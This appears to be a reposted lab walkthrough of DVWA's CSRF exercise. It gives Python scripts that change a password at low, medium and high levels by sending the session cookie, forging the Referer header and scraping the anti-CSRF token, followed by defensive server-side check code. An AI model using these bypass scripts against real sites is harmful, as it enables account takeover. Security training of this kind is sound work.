DVWA - CSRF (low, medium, high)
Source: Internet  Editor: 程序博客网  Time: 2024/04/28 05:20
low
Setting the PHPSESSID and security cookies is enough to send the cross-site request.
import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low',
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    # res.text is the decoded body (res.content is bytes on Python 3)
    if 'Password Changed.' in res.text:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()
medium
Looking at the source code, we find:
// Checks to see where the request came from
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
The request origin is verified from the Referer. Bypass idea: declare the Referer in the HTTP request headers.
import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    # res.text is the decoded body (res.content is bytes on Python 3)
    if 'Password Changed.' in res.text:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()
high
Looking at the source code, there is an additional dynamic user_token check:
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
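Bypass idea: in code, send a cross-site request to fetch the user_token dynamically, then send another cross-site request to change the password.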
import re

import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
    }
    # First request: load the form and read the hidden user_token field
    res = requests.get(url, headers=headers)
    # res.text is the decoded body (res.content is bytes on Python 3)
    m = re.search(r"user_token' value='(.*?)'", res.text, re.M | re.S)
    if m:
        user_token = m.group(1)
        new_password = 'ac'
        url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token)
        # Second request: submit the password change with the token
        res = requests.get(url, headers=headers)
        if 'Password Changed.' in res.text:
            print('Yes')
        else:
            print('No')
    print(res.text)


if __name__ == '__main__':
    main()
Note: these 3 experiments need to be done cross-site; don't keep testing in the same local browser all the time, that's pointless.
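The medium and high checks seen from the server side, as an added example that is not part of the original post or of DVWA's code: the medium-level pattern match beside an exact host comparison, plus a single-use session token check. The function names, the dict standing in for the PHP session, and the sample header values are assumptions made for illustration.

```python
import hmac
import re
import secrets
from urllib.parse import urlsplit

SERVER_NAME = "192.168.67.22"  # the lab host used on this page

def referer_check_weak(referer):
    # Same logic as the medium-level eregi() call: the server name is used as
    # a case-insensitive pattern and may match anywhere in the header value.
    return bool(referer) and re.search(SERVER_NAME, referer, re.I) is not None

def referer_check_strict(referer, scheme="http"):
    # Parse the header and compare scheme and host exactly.
    if not referer:
        return False
    try:
        parts = urlsplit(referer)
    except ValueError:  # malformed header value
        return False
    return parts.scheme == scheme and parts.hostname == SERVER_NAME

def issue_token(session):
    # Fresh random token, stored server-side and embedded in the form.
    session["session_token"] = secrets.token_hex(16)
    return session["session_token"]

def token_ok(session, user_token):
    expected = session.get("session_token")
    if not expected or not user_token:
        return False
    # Constant-time comparison on bytes (also accepts non-ASCII input).
    return hmac.compare_digest(expected.encode(), user_token.encode())

def may_change_password(session, referer, user_token):
    ok = referer_check_strict(referer) and token_ok(session, user_token)
    session.pop("session_token", None)  # single use; the next form gets a new one
    return ok

# Constructed sample header values, not captured traffic.
SAME_SITE = "http://192.168.67.22/dvwa/vulnerabilities/csrf/"
OTHER_SITE = "http://other.example/192.168.67.22.html"

if __name__ == "__main__":
    for ref in (SAME_SITE, OTHER_SITE, None):
        print(ref, referer_check_weak(ref), referer_check_strict(ref))
```

These checks only constrain a browser that another site is driving. A client that already holds the PHPSESSID, like the scripts above, can set any header and read the token from the form, so the session cookie itself still has to be protected.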